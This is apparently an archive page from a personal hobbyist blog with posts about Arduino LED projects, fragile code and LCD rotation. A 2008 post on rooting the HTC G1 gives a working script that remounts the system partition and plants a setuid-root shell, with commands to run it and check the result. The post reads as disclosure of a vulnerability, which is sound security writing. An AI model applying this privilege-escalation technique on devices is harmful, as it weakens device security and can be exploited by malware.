codeblog

3/8/2010

Cylon Dorkshield

Filed under: Blogging, Debian, Embedded, Ubuntu — kees @ 8:42 pm

I’ve finally soldered on the LEDs for the Cylon DorkShield I designed and got built in a recent DorkBotPDX PCB run. I’m having trouble with the programmer, but I got the shield mostly working:

Cylon DorkShield

10/7/2009

Larson Scanner on Arduino

Filed under: Blogging, Embedded, Ubuntu — kees @ 8:58 am

Inspired by the Larson Scanner project, I finally broke out my Arduino and ported the code from the ATtiny to the ATmega. (The Arduino IDE runs fine with openjdk-6.) I’m sure the power usage is terrible, but I wasn’t after long battery life. I wanted my very own Cylon eye.

DorkBoard running the Cylon eye

Since I was successful with porting the code and wiring up the Arduino, I figured I’d see if the tiny Arduino-clone called the “DorkBoard” would work with it too.

Later in the weekend I grabbed a AAA-battery holder and hooked that up so the eye is untethered from the USB power source. Next up, coding the pesky self-awareness.

11/9/2008

“rooting” the HTC G1 Android

Filed under: Blogging, Debian, Embedded, Security, Ubuntu, Vulnerabilities — kees @ 10:27 am

People noticed that running telnetd seemed to run as root. Later it was discovered that everything you typed was being run by the root user also. So, that ends the first mystery: when you typed “telnetd” both the Terminal user and root ran it. It would fail (without error messages) for the Terminal user, and run successfully for the root user. So now, the question is, what the f is a root shell doing mirroring user input?!

So, there is a much easier way to get root that doesn’t require network connectivity. While the /sdcard mount point is nosuid,noexec, it’ll still run scripts if you explicitly direct them to run. It seems that the weird background root shell doesn’t understand the alt-keys, so it can only run stuff that can be typed without using alt, shift, etc. So, put the following in /sdcard/pwn:


mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
cd /system/bin
cat sh > sh.root
chmod 4755 sh.root
mount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system

You can either do this by dropping the file in place over USB mass storage, or you can type it via the Terminal using “cat“. (Rebooting here might help get the root shell in a sane state.) Finally, just navigate there without slashes and run the script:


$ cd sdcard
$ sh pwn

You’ll see lots of errors (but these are only from the Terminal user). The script is, however, run by the root shell too. You can verify the results:


$ ls -l /system/bin/sh*
-rwxr-xr-x root          shell     86936 2008-09-13 00:13 sh
-rwsr-xr-x root          root      86936 2008-11-09 10:12 sh.root

Next up: cross-compiling a little helper to elevate to real UID 0, and require a password to keep malware from looking for setuid shells.

1/9/2005

Fragile Code

Filed under: Embedded — kees @ 7:27 pm

I define fragile code as code that isn’t easily changed without introducing bugs. I think the biggest cause of fragile code is cut/paste algorithms. This is especially true for data access and processing routines.

The idea behind Object Oriented programming is that you end up creating accessor functions for all your data. It’s simple to change your data formats without breaking the program as a whole. When you don’t have an OO language, you create all kinds of methods to do your repeated work.

This is critically important for stable, readable, sane code. Functions should do something small, and do it very well. Then you can call a whole series of strong little functions, rather than cutting and pasting the same code over and over, only to wreck your day much later on.

1/4/2005

Fun with LCDs

Filed under: Embedded — kees @ 11:09 am

Worked for a little while last night trying to figure out how to rotate the image on an LCD screen. Turns out the controller actually has a built in rotation ability. All the examples in the docs show a portrait LCD display being rotated to a landscape LCD display. I needed to the do the opposite. Anyway, 1 typo and several LCD controller registers later, I had convinced it to work, but with a nasty flicker. I dug around a little more and finally found where I could define “line widths” for the display memory (as in, each line of physical memory is 256 bytes, but it’s only going to display 240 of those bytes). Thank goodness the display library had already been set up to deal with virtual spans. Anyway, with that in place, it came up perfectly. Yay! It’s going to wreak havoc on the the testing routines: let’s just say the screen CRCs aren’t going to be the same. In fact, the screen CRCs might be just flat wrong; I’m not sure what portions of video memory it scans.

Powered by WordPress